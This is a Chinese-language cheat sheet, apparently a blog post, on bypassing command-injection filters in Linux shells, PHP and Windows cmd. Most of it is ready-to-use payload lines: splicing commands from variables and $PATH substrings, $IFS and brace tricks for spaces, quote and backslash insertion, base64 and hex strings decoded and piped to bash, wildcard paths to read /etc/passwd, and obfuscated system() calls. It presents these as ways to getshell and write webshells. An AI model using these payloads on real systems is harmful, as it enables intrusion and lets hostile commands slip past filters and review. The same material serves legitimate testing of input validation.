## Linux篇
### 命令拼接
```
a=who
b=ami
$a$b //输出whoami
```
常用字符使用
```
& 表示将任务置于后台执行
; 多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块
&& 只有在 && 左边的命令返回真(命令返回值 $? == 0),&&右边的命令才会被执行。
|| 只有在 || 左边的命令返回假(命令返回值 $? == 1),||右边的命令才会被执行。
%0a
%0d
| (管道符) |表示管道,上一条命令的输出,作为下一条命令的参数
```
例:
```
echo qwe ; ls //会先输出字符qwe,然后执行ls
q=l; w=s; e=" -al"; $q$w$e //执行ls -al命令
qwe | ls //执行后面的命令,前面的不执行
```
这些都可以自己去试试...这些字符最多用到的就是;和|就先只说最常用的了...
### 利用Linux的环境变量
```
echo ${PATH}///usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
echo ${PATH:1:9}//usr/local
```
所以,我们可以通过截断和拼接来得到我们想要的来getshell
```
${PATH:5:1}//l
${PATH:2:1}//s
${PATH:5:1}${PATH:2:1}//拼接后是ls,执行命令
${PATH:5:1}s//拼接后是ls,执行命令
```
空格绕过
```
$IFS
$IFS$1
${IFS}
$IFS$9
< 比如cat
<>
{cat,flag.php} //用逗号实现了空格功能,需要用{}括起来
%20
%09
```
### 绕过关键字
基础常见版本:
```
wh\o\ami//反斜线绕过
who"a"mi//双引号绕过
whoa'm'i//单引号绕过
whoam``i//反引号绕过
echo d2hvYW1p|base64 -d|sh//base64绕过,其中d2hvYW1p是whoami的base64编码
echo d2hvYW1p|base64 -d|bash//base64绕过,其中d2hvYW1p是whoami的base64编码
`echo d2hvYW1p|base64 -d` //将其base64解码,然后用反引号来执行命令
echo 77686F616D69 | xxd -r -p | bash //hex绕过,其中77686F616D69是whoami的hex编码
//$*和$@,$x(x 代表 1-9),${x}(x>=10) :比如ca${21}t a.txt表示cat a.txt 在没有传入参数的情况下,这些特殊字符默认为空,如下:
wh$1oami
who$@ami
whoa$*mi
```
进阶深入:
```
666`whoami`666//bash: 666root666: command not found
666`\whoami`666//bash: 666root666: command not found
//命令执行后的结果在2个666中间
```
所以更进一步:
```
w`f1hgb`ho`f1hgb`am`f1hgb`i//反引号的作用是把括起来的字符当做命令执行
w`\f1hgb`ho`\f1hgb`am`\f1hgb`i//这个反斜线作用就是平时的那种连接,反引号的作用是把括起来的字符当做命令执行
wh$(f1hgb)oa$(f1hgb)mi//和上面的差不多,都说执行和拼接
```
上述的是既可以绕过命令,又可以绕过文件名的,下述的则是只能用来绕过文件名的:
```
cat fl[abc]g.php //匹配[abc]中的任何一个
cat f[a-z]ag.txt //匹配a-z范围的任何字符
cat fla* //用*匹配任意
a=f;d=ag;c=l;cat $a$c$d.php 表示cat flag.php//内联执行
```
下述的则是文件名绕过
```
利用正则:比如要读取etc/passwd
cat /???/??????
cat /???/pass*
cat /etc$u/passwd
```
### 命令执行函数绕过
这里只举例`system`
```
system("cat /etc/passwd")
<=>
"\x73\x79\x73\x74\x65\x6d"("cat /etc/passwd");
<=>
(sy.(st).em)("cat /etc/passwd");
<=>还可以用注释方法绕过
"system/*fthgb666*/("cat /etc/passwd);"
<=>
"system/*fthgb666*/(wh./*fthgb666*/(oa)/*fthgb666*/.mi);"
<=>
"(sy./*fthgb666*/(st)/*fthgb666*/.em)/*fthgb666*/(wh./*fthgb666*/(oa)/*fthgb666*/.mi);"
```
## windows篇
### 符号与命令
```
whoami //正常执行
w"h"o"a"m"i 或"w"h"o"a"m"i"或"w"h"o"a"m"i或w"h"o"a"m"i"//正常执行
who^ami或wh""o^a^mi 或wh""o^a^mi"//正常执行
但是"wh""o^a^mi"这种在开头就有单引号的情况是不能执行的
(Whoami)或(Wh^o^am""i)或((((Wh^o^am""i)))) //正常执行 注:可以加无数个"但不能同时连续加2个^符号,因为^号是cmd中的转义符,跟在他后面的符号会被转义
```
### set命令
*知识点:用两个%括起来的变量,会输出变量的值*
```
set a=1 //设置变量a,值为1
echo a //此时输出结果为"a"
echo %a% //此时输出结果为"1"
```
接下来的进阶利用就是:
```
set a=who
set b=ami
%a%%b% //正常执行whoami
call %a%%b% //正常执行whoami
```
所以,上述的符号与命令部分的所有操作,都可以通过set来实现,只需要慢慢拼接就ok
### 切割字符
```
set a=whoami
%a:~0% //取出所有字符,所以正常执行命令
%a:~0,6% //从开始切割6个字符,刚好是whoami,所以正常执行
%a:~0,5% //切割后是whoam,不是系统命令,不能执行
```
注:上述可以使用减号,和python的切割效果差不多
所以,可以考虑的东西就来了:
```
set a=abc qwe //先自定义
wh^o^%a:~0,1%mi //然后截断整理后就变成了:wh^o^ami,所以命令执行成功
```
所以,这样写webshell什么的也就很简单了
### 逻辑运算符
- |:可以连接命令,但只会执行后面的那条
- ||:只有前面的命令失败,才会执行后面的语句
- &:前面的命令可以成功也可以失败,都会执行后面的命令
- &&:必须两条命令都为真才可以全部执行。如果第一条语句错误,整个命令都不执行。如果第一条语句对,第二条错误,就只执行第一条
```
whoami | ping www.baidu.com
whoami || ping www.baidu.com
qwe & ping www.baidu.com
qwe && ping www.baidu.com
```
8626
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
